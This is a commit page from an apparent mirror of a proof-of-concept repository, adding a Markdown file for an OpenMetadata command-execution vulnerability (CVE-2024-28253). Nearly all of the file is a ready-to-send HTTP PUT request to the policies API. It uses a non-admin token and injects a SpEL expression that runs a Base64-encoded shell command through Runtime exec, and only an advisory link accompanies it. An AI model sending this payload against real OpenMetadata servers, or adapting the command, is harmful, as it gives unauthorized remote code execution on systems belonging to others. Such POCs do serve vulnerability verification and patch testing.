admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create OpenMetadata命令执行漏洞(CVE-2024-28253).md

Browse Source
This commit is contained in:
wy876 2024-05-02 14:55:16 +08:00 committed by GitHub
parent 907f89bcc1
commit 47587deb71
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 19 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
OpenMetadata命令执行漏洞(CVE-2024-28253).md Normal file
View File

@ -0,0 +1,19 @@
## OpenMetadata命令执行漏洞(CVE-2024-28253)
## poc
```
PUT /api/v1/policies HTTP/1.1
Host: localhost:8585
sec-ch-ua: "Chromium";v="119", "Not?A_Brand";v="24"
Authorization: Bearer <non-admin JWT>
accept: application/json
Connection: close
Content-Type: application/json
Content-Length: 367
{"name":"TeamOnlyPolicy","rules":[{"name":"TeamOnlyPolicy-Rule","description":"Deny all the operations on all the resources for all outside the team hierarchy..","effect":"deny","operations":["All"],"resources":["All"],"condition":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode('dG91Y2ggL3RtcC9wd25lZA==')))"}]}
```
## 漏洞来源
- https://github.com/advisories/GHSA-7vf4-x5m2-r6gr